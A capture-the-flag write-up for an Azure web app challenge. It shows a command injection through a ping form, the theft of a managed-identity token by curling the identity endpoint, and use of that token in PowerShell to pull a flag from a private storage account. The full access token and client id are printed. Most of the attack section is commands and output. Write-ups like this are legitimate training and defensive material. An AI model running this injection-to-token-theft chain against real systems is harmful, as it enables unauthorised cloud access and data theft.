Managed Secrets

DifficultyPointsSolves

Medium

500

3

Description

Today in school, I learnt how to create a website with python! There is also the networking lesson where i learn the ping command...

ps the flag is not in the instance :)

https://lncctf2023-webapp.azurewebsites.net

Hints: Are there any internal services/endpoint running by default?

Visiting the sites show an Azure Web App Service running

What the web app does is to send a ping to whatever IP Address or URL you define it to. This is a very classical command injection sample challenge, and we are able to easily get code execution

8.8.8.8 & whoami

Since I now have code execution, I can get the app service to post to the IMDS to retrieve a management token refering to hacktricks.

8.8.8.8 & curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
{"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Ii1LSTNROW5OUjdiUm9meG1lWm9YcWJIWkdldyIsImtpZCI6Ii1LSTNROW5OUjdiUm9meG1lWm9YcWJIWkdldyJ9.eyJhdWQiOiJodHRwczovL21hbmFnZW1lbnQuYXp1cmUuY29tLyIsImlzcyI6Imh0dHBzOi8vc3RzLndpbmRvd3MubmV0L2MxMWIyMmQyLWQwMTUtNDdlMC1iYzBiLWU2YTBiMWUyNTk5My8iLCJpYXQiOjE2ODE1OTc3NDcsIm5iZiI6MTY4MTU5Nzc0NywiZXhwIjoxNjgxNjg0NDQ3LCJhaW8iOiJFMlpnWU1ndCttZStRMWVUclhucXQ3MHFINTQ5QkFBPSIsImFwcGlkIjoiOTgyZDFjYTktODFlZS00NTBlLTg5NTMtMGYxYTI3MTI5ZWIyIiwiYXBwaWRhY3IiOiIyIiwiaWRwIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvYzExYjIyZDItZDAxNS00N2UwLWJjMGItZTZhMGIxZTI1OTkzLyIsImlkdHlwIjoiYXBwIiwib2lkIjoiZDcwOTFkYmMtNzZiMy00ODAyLWI1MDQtZWNlZTgzYjkwMTQ4IiwicmgiOiIwLkFVb0EwaUlid1JYUTRFZThDLWFnc2VKWmswWklmM2tBdXRkUHVrUGF3ZmoyTUJPSkFBQS4iLCJzdWIiOiJkNzA5MWRiYy03NmIzLTQ4MDItYjUwNC1lY2VlODNiOTAxNDgiLCJ0aWQiOiJjMTFiMjJkMi1kMDE1LTQ3ZTAtYmMwYi1lNmEwYjFlMjU5OTMiLCJ1dGkiOiJuVXd0ZGxsZTAwS1FZZWNvbm9ZUkFBIiwidmVyIjoiMS4wIiwieG1zX21pcmlkIjoiL3N1YnNjcmlwdGlvbnMvZDc3NDg3MDYtZjZjYy00ZTlkLWExZjgtMWZjODAyMTkxNDU2L3Jlc291cmNlZ3JvdXBzL2xuY2N0ZjIwMjNfbWFuYWdlZF9zZWNyZXRzL3Byb3ZpZGVycy9NaWNyb3NvZnQuV2ViL3NpdGVzL2xuY2N0ZjIwMjMtd2ViYXBwIiwieG1zX3RjZHQiOjE2Njk3MDczODR9.XgYwXTajTJSW7jpEu7AADt2pRc5VwR37LqMf2GLMV2ez1hz4wMCStEdi9kWJyIYFcIpiPK5PozJJMcJb4Qk4jPyTurwzO9B2Pi5jxdVE2iUXP2PdU6ygsLvCWSuA10mvem-cojdyNepQ7hXW7eupHNeNsoxNer0X9zHCN5_YgG_60AEbdM5uguGhqqhVYxVAaWW8YyS-VC4ZPe1BoCpTGOZdxlFkwMe_K94h6F6VRZjY11EvUFUu_eOlaL_mnrjZXi_EZy7ZvxpycVBUbcgrNrvKqPZb8JLslajDq9kkjXeGeRsdcw1AtLhPnrYCvOS6-s6QWgyq8InGL4bo600Tbw","expires_on":"04/16/2023 22:34:06 +00:00","resource":"https://management.azure.com/","token_type":"Bearer","client_id":"982d1ca9-81ee-450e-8953-0f1a27129eb2"}

I am able to authenticate using the access token and client id value

$token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Ii1LSTNROW5OUjdiUm9meG1lWm9YcWJIWkdldyIsImtpZCI6Ii1LSTNROW5OUjdiUm9meG1lWm9YcWJIWkdldyJ9.eyJhdWQiOiJodHRwczovL21hbmFnZW1lbnQuYXp1cmUuY29tLyIsImlzcyI6Imh0dHBzOi8vc3RzLndpbmRvd3MubmV0L2MxMWIyMmQyLWQwMTUtNDdlMC1iYzBiLWU2YTBiMWUyNTk5My8iLCJpYXQiOjE2ODE1OTc3NDcsIm5iZiI6MTY4MTU5Nzc0NywiZXhwIjoxNjgxNjg0NDQ3LCJhaW8iOiJFMlpnWU1ndCttZStRMWVUclhucXQ3MHFINTQ5QkFBPSIsImFwcGlkIjoiOTgyZDFjYTktODFlZS00NTBlLTg5NTMtMGYxYTI3MTI5ZWIyIiwiYXBwaWRhY3IiOiIyIiwiaWRwIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvYzExYjIyZDItZDAxNS00N2UwLWJjMGItZTZhMGIxZTI1OTkzLyIsImlkdHlwIjoiYXBwIiwib2lkIjoiZDcwOTFkYmMtNzZiMy00ODAyLWI1MDQtZWNlZTgzYjkwMTQ4IiwicmgiOiIwLkFVb0EwaUlid1JYUTRFZThDLWFnc2VKWmswWklmM2tBdXRkUHVrUGF3ZmoyTUJPSkFBQS4iLCJzdWIiOiJkNzA5MWRiYy03NmIzLTQ4MDItYjUwNC1lY2VlODNiOTAxNDgiLCJ0aWQiOiJjMTFiMjJkMi1kMDE1LTQ3ZTAtYmMwYi1lNmEwYjFlMjU5OTMiLCJ1dGkiOiJuVXd0ZGxsZTAwS1FZZWNvbm9ZUkFBIiwidmVyIjoiMS4wIiwieG1zX21pcmlkIjoiL3N1YnNjcmlwdGlvbnMvZDc3NDg3MDYtZjZjYy00ZTlkLWExZjgtMWZjODAyMTkxNDU2L3Jlc291cmNlZ3JvdXBzL2xuY2N0ZjIwMjNfbWFuYWdlZF9zZWNyZXRzL3Byb3ZpZGVycy9NaWNyb3NvZnQuV2ViL3NpdGVzL2xuY2N0ZjIwMjMtd2ViYXBwIiwieG1zX3RjZHQiOjE2Njk3MDczODR9.XgYwXTajTJSW7jpEu7AADt2pRc5VwR37LqMf2GLMV2ez1hz4wMCStEdi9kWJyIYFcIpiPK5PozJJMcJb4Qk4jPyTurwzO9B2Pi5jxdVE2iUXP2PdU6ygsLvCWSuA10mvem-cojdyNepQ7hXW7eupHNeNsoxNer0X9zHCN5_YgG_60AEbdM5uguGhqqhVYxVAaWW8YyS-VC4ZPe1BoCpTGOZdxlFkwMe_K94h6F6VRZjY11EvUFUu_eOlaL_mnrjZXi_EZy7ZvxpycVBUbcgrNrvKqPZb8JLslajDq9kkjXeGeRsdcw1AtLhPnrYCvOS6-s6QWgyq8InGL4bo600Tbw"
$id = "982d1ca9-81ee-450e-8953-0f1a27129eb2"

Connect-AzAccount -AccessToken $token -AccountId $id

Next, I enumerate the resource that this service principal has access to.

I am then able to retrieve the flag from the storage account.

$rg="lncctf2023_managed_secrets"
$saname="lncctf2023managedsa"
$sa = Get-AzStorageAccount -ResourceGroupName $rg -StorageAccountName $saname
$ctx = $sa.Context

Get-AzStorageContainer -Context $ctx
Get-AzStorageBlob -Context $ctx -Container private
Get-AzStorageBlobContent -Blob flag.txt -Container private -Destination flag.txt -Context $ctx

Flag: LNC2023{h3y_h0w_did_y0u_g3T_thi5}

PreviousLag and Crash 2023NextPickle Rick

Last updated